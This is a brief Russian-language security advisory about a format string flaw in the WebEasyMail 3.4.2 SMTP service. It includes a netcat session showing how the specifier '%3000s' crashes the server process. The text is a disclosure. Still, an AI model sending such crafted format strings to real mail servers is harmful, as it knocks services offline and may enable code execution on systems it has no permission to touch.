Security Lab

Выполнение произвольного кода в WebEasyMail

Дата публикации:22.08.2002
Всего просмотров:939
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: В WebEasyMail обнаружена уязвимость форматной строки в SMTP службе. Удаленный пользователь может передать спецификатор формата, который приведет нарушению структуры памяти и переполнению буфера. Уязвимость может использоваться для выполнения произвольного кода. Пример:
$ nc localhost 25
220 ESMTP on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
%2
502 Error: command not implemented
%2s
502 Error: command not implemented
%100s
502 Error: command not implemented
%3000s
[emsrv.exe silently dies here]
$
уязвимость обнаружена в WebEasyMail 3.4.2
Ссылки: Advisory: DoS in WebEasyMail +more possible?